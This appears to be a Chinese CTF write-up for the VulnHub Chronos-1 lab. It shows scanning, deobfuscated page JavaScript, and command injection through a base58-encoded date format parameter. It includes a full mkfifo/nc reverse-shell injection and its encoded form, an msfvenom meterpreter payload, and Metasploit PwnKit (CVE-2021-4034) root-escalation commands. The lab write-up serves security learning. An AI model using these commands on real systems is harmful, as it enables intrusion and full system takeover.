第三周

靶机下载地址：https://www.vulnhub.com/entry/chronos-1,735/
环境折磨导致做晚了，再加上期末的考试多耽搁下来了，然后就是辗转反侧打比赛，拖了这么久，时隔三个月重新开打
因为陆陆续续打了两次，所以环境可能变化了，IP不同见谅

信息收集

┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h 192.168.56.101___                              _  / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.56.101  is alive
[*] Icmp alive hosts len is: 1
192.168.56.101:80 open
Open result.txt error, open result.txt: permission denied
192.168.56.101:22 open
Open result.txt error, open result.txt: permission denied
192.168.56.101:8000 open
Open result.txt error, open result.txt: permission denied
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.56.101     code:200 len:1887   title:None
Open result.txt error, open result.txt: permission denied
[*] WebTitle: http://192.168.56.101:8000 code:200 len:1887   title:None
Open result.txt error, open result.txt: permission denied

┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap --min-rate 1000 -p- 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 18:01 CST
Nmap scan report for 192.168.56.101
Host is up (0.00011s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/Tools/fscan]
└─$ sudo nmap -sV -sT -O -p22,25,80,110,8000 192.168.56.101
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 18:49 CST
Nmap scan report for 192.168.56.101
Host is up (0.00080s latency).PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
25/tcp   open  tcpwrapped
80/tcp   open  http       Apache httpd 2.4.29 ((Ubuntu))
110/tcp  open  tcpwrapped
8000/tcp open  http       Node.js Express framework
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running: Actiontec embedded, Linux 3.X
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:3.2
OS details: Actiontec MI424WR-GEN3I WAP, Linux 3.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.97 seconds

‍

先对80服务进行探测：

​

什么都没有，看看页面源代码：

​

有一串script，看看：

var _0x5bdf=['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'];(function(_0x506b95,_0x817e36){var _0x244260=_0x432d;while(!![]){try{var _0x35824b=-parseInt(_0x244260(0x7e))*parseInt(_0x244260(0x90))+parseInt(_0x244260(0x8e))+parseInt(_0x244260(0x7f))*parseInt(_0x244260(0x83))+-parseInt(_0x244260(0x87))+-parseInt(_0x244260(0x82))*parseInt(_0x244260(0x8d))+-parseInt(_0x244260(0x88))+parseInt(_0x244260(0x80))*parseInt(_0x244260(0x84));if(_0x35824b===_0x817e36)break;else _0x506b95['push'](_0x506b95['shift']());}catch(_0x3fb1dc){_0x506b95['push'](_0x506b95['shift']());}}}(_0x5bdf,0xcaf1e));function _0x432d(_0x16bd66,_0x33ffa9){return _0x432d=function(_0x5bdf82,_0x432dc8){_0x5bdf82=_0x5bdf82-0x7e;var _0x4da6e8=_0x5bdf[_0x5bdf82];return _0x4da6e8;},_0x432d(_0x16bd66,_0x33ffa9);}function loadDoc(){var _0x17df92=_0x432d,_0x1cff55=_0x17df92(0x8f),_0x2beb35=new XMLHttpRequest();_0x2beb35[_0x17df92(0x89)]=function(){var _0x146f5d=_0x17df92;this[_0x146f5d(0x85)]==0x4&&this[_0x146f5d(0x8c)]==0xc8&&(document[_0x146f5d(0x91)](_0x146f5d(0x93))[_0x146f5d(0x92)]=this[_0x146f5d(0x86)]);},_0x2beb35[_0x17df92(0x81)]('GET',_0x17df92(0x8a),!![]),_0x2beb35['setRequestHeader'](_0x17df92(0x8b),_0x1cff55),_0x2beb35['send']();}

丢给厨子美化一下：

​

var _0x5bdf = ['150447srWefj','70lwLrol','1658165LmcNig','open','1260881JUqdKM','10737CrnEEe','2SjTdWC','readyState','responseText','1278676qXleJg','797116soVTES','onreadystatechange','http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL','User-Agent','status','1DYOODT','400909Mbbcfr','Chronos','2QRBPWS','getElementById','innerHTML','date'
];
(function (_0x506b95, _0x817e36) {var _0x244260 = _0x432d;while (!![]) {try {var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));if (_0x35824b === _0x817e36)break;else_0x506b95['push'](_0x506b95['shift']());} catch (_0x3fb1dc) {_0x506b95['push'](_0x506b95['shift']());}}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {return _0x432d = function (_0x5bdf82, _0x432dc8) {_0x5bdf82 = _0x5bdf82 - 126;var _0x4da6e8 = _0x5bdf[_0x5bdf82];return _0x4da6e8;}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();_0x2beb35[_0x17df92(137)] = function () {var _0x146f5d = _0x17df92;this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();
}

漏洞利用

有一串字符：

http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

发现对8000端口发送了一个base加密的数据，而且8000端口就是我们刚才扫出来的

解码看看他是啥：

​
​

发现是base58

而且里面的数据就是'+Today is %A, %B %d, %Y %H:%M:%S.'​

我们发送给8000端口试试：

​
​

直接发送，发现它禁止了

​
​

可以注意到它这里发送数据的时候其实是有域名的，我们添加一下域名再试试：

​
​

访问域名之后可以发现:

​
​

抓到包了，而且可以交互，'+Today is %A, %B %d, %Y %H:%M:%S.'​就是页面的回显，这里发现和执行date命令是一样的

​

所以可以猜测这里服务器就是利用了date执行命令，所以我们可以尝试使用命令分隔符来执行：

​
​

​
​

发现可以执行命令

这里如果执行不了命令，去历史里面找

​
​

‍

执行命令反弹shell

先执行'+Today is %A, %B %d, %Y %H:%M:%S.'&&ls /bin​

​
​

这里可以用curl，也可以nc​

用nc做示范：

'+Today is %A, %B %d, %Y %H:%M:%S.'&&rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.120.128 9999 >/tmp/f
QxtDBXuBRWpQV13Ua2qX95tzNhAkMmmKhMR8wXc1X8AnLPJTUKdYnBihbFotj9mYXyohdcAHH1DpDcdX3BTQyqewC7UBgSmUApQxu3xp3dUd1NBcewhGsN3iM29B59gLtTvSeVySVM7RKboLGPyTUxAL2yq16rajz2L5T

​

权限提升

发现权限有点低，想办法提权，先试试suid

www-data@chronos:/opt/chronos$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core/16091/bin/mount
/snap/core/16091/bin/ping
/snap/core/16091/bin/ping6
/snap/core/16091/bin/su
/snap/core/16091/bin/umount
/snap/core/16091/usr/bin/chfn
/snap/core/16091/usr/bin/chsh
/snap/core/16091/usr/bin/gpasswd
/snap/core/16091/usr/bin/newgrp
/snap/core/16091/usr/bin/passwd
/snap/core/16091/usr/bin/sudo
/snap/core/16091/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/16091/usr/lib/openssh/ssh-keysign
/snap/core/16091/usr/lib/snapd/snap-confine
/snap/core/16091/usr/sbin/pppd
/bin/ping
/bin/fusermount
/bin/mount
/bin/su
/bin/umount
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1

有一个pkexec，上次闽盾杯就是倒在他手上，这次又遇到了

直接尝试CVE-2021-4034-main

​编译-->上传-->赋权-->执行​

行云流水，但是失败了

献上MSF打

先上线：

shell> msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.120.128  LPORT=7777 -f elf > pb.elf
shell> msfconsolemsf6> use exploit/multi/handler
msf6> set lport 7777
msf6> set lhost 192.168.120.128
msf6> set payload linux/x64/meterpreter/reverse_tcp
msf6> run

‍

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
set PKEXECPATH /use/bin/pkexec
set lport 7777
set lhost 192.168.120.128

​
​

成功root权限，拿下！

‍

看了预期解，似乎是找nodejs的漏洞，然后利用nodejs提权，懒不搞了